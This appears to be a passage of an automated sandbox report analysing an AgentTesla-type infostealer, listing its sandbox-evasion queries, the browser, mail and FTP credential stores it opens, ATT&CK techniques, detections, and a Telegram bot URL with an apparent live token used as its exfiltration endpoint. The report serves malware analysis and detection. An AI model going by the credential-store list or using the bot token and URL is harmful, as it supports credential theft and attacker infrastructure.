                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeMemory allocated: 2670000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2888404652.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeQueries volume information: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2889163730.00000000026DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2889163730.00000000026BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872, type: MEMORYSTR
                          Source: Yara matchFile source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                          Source: Yara matchFile source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2889163730.00000000026DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2889163730.00000000026BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872, type: MEMORYSTR
                          Source: Yara matchFile source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872, type: MEMORYSTR
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          12
                          Virtualization/Sandbox Evasion
                          2
                          OS Credential Dumping
                          1
                          Query Registry
                          Remote Services1
                          Email Collection
                          1
                          Web Service
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                          Disable or Modify Tools
                          1
                          Input Capture
                          111
                          Security Software Discovery
                          Remote Desktop Protocol1
                          Input Capture
                          11
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                          Deobfuscate/Decode Files or Information
                          1
                          Credentials in Registry
                          12
                          Virtualization/Sandbox Evasion
                          SMB/Windows Admin Shares11
                          Archive Collected Data
                          2
                          Non-Application Layer Protocol
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          DLL Side-Loading
                          NTDS1
                          Process Discovery
                          Distributed Component Object Model2
                          Data from Local System
                          3
                          Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
                          File and Directory Discovery
                          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials24
                          System Information Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe63%VirustotalBrowse
                          17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe71%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                          17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe100%AviraHEUR/AGEN.1305739
                          17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe100%Joe Sandbox ML
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          api.telegram.org
                          149.154.167.220
                          truefalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocumentfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://account.dyn.com/17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exefalse
                                high
                                https://api.telegram.org17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exefalse
                                    high
                                    http://api.telegram.org17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        149.154.167.220
                                        api.telegram.orgUnited Kingdom
                                        62041TELEGRAMRUfalse
                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1430866
                                        Start date and time:2024-04-24 10:15:27 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 4m 34s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:5
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 47
                                        • Number of non-executed functions: 1
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
